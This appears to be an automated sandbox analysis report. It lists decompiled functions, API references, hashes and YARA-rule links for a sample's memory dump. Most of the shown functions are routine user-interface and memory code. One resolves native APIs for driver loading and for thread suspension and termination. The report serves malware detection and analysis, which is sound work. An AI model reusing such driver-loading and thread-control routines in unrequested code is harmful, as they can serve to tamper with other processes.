0x00404813
0x00404834

APIs

GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
_snwprintf.MSVCRT ref: 00404813
MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C

Strings

Error %d: %s, xrefs: 00404802
Error, xrefs: 0040481D

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastMessage_snwprintf
String ID: Error$Error %d: %s
API String ID: 313946961-1552265934
Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C

Uniqueness

Uniqueness Score: -1.00%

Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}

APIs

Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791

??2@YAPAXI@Z.MSVCRT ref: 0040692E
??2@YAPAXI@Z.MSVCRT ref: 0040694A
memcpy.MSVCRT ref: 0040696D
memcpy.MSVCRT ref: 0040697E
??2@YAPAXI@Z.MSVCRT ref: 00406A01
??2@YAPAXI@Z.MSVCRT ref: 00406A0B

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
String ID:
API String ID: 975042529-0
Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8

Uniqueness

Uniqueness Score: -1.00%

Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

APIs

Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21

??2@YAPAXI@Z.MSVCRT ref: 004097F6
memset.MSVCRT ref: 00409805
memcpy.MSVCRT ref: 0040988A
memcpy.MSVCRT ref: 004098C0
??3@YAXPAX@Z.MSVCRT ref: 004098EC

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$memcpy$??2@??3@HandleModulememset
String ID:
API String ID: 3641025914-0
Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}

APIs

Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791

??3@YAXPAX@Z.MSVCRT ref: 004067C7
??3@YAXPAX@Z.MSVCRT ref: 004067DA
??3@YAXPAX@Z.MSVCRT ref: 004067ED
??3@YAXPAX@Z.MSVCRT ref: 00406800
free.MSVCRT(00000000), ref: 00406839

Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED

Uniqueness

Uniqueness Score: -1.00%

Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}

0x00405d03
0x00405d06
0x00405d10
0x00405d17
0x00405d22
0x00405d32
0x00405d40
0x00405d48
0x00405d4e
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00405d67

APIs

GetParent.USER32(?), ref: 00405D0A
GetWindowRect.USER32 ref: 00405D17
GetClientRect.USER32 ref: 00405D22
MapWindowPoints.USER32 ref: 00405D32
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}

APIs

??2@YAPAXI@Z.MSVCRT ref: 004083EB
memcpy.MSVCRT ref: 00408413
memcpy.MSVCRT ref: 0040841D
memcpy.MSVCRT ref: 00408427
??3@YAXPAX@Z.MSVCRT ref: 00408442

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$??2@??3@
String ID:
API String ID: 1252195045-0
Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98

Uniqueness

Uniqueness Score: -1.00%

Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}

APIs

??3@YAXPAX@Z.MSVCRT ref: 00406752
??3@YAXPAX@Z.MSVCRT ref: 00406760
??3@YAXPAX@Z.MSVCRT ref: 00406771
??3@YAXPAX@Z.MSVCRT ref: 00406788
??3@YAXPAX@Z.MSVCRT ref: 00406791

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}

APIs

BeginDeferWindowPos.USER32 ref: 0040ABBA

Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4

EndDeferWindowPos.USER32(?), ref: 0040ABFE
InvalidateRect.USER32(?,?,00000001), ref: 0040AC09

Strings

$, xrefs: 0040AC28

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$Rect$BeginClientInvalidateItem
String ID: $
API String ID: 2498372239-3993045852
Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}

0x00403a7d
0x00403a8c
0x00403a9c
0x00403aba
0x00403adf
0x00403ae7
0x00403af4
0x00403af4
0x00403ae7
0x00403aba
0x00403a9c
0x00403b13

APIs

GetKeyState.USER32(000000A2), ref: 00403A8C

Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64

SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C

Strings

A, xrefs: 00403A7F

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: State$CallMessageProcSendWindow
String ID: A
API String ID: 3924021322-3554254475
Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59

Uniqueness

Uniqueness Score: -1.00%

Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}

0x004034f0
0x004034f8
0x00403506
0x00403516
0x0040351c
0x00403531
0x00403537
0x00403545
0x0040354a
0x00403556
0x00403567
0x00403575
0x00403583
0x00403583
0x00403586
0x00403592
0x00403598
0x004035ac

APIs

Part of subcall function 00402923: memset.MSVCRT ref: 00402935

Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722

memset.MSVCRT ref: 00403537
_ultow.MSVCRT ref: 00403575

Strings

q, xrefs: 00403556
cf@, xrefs: 0040352B

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset$_ultow
String ID: cf@$q
API String ID: 3448780718-2693627795
Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8

Uniqueness

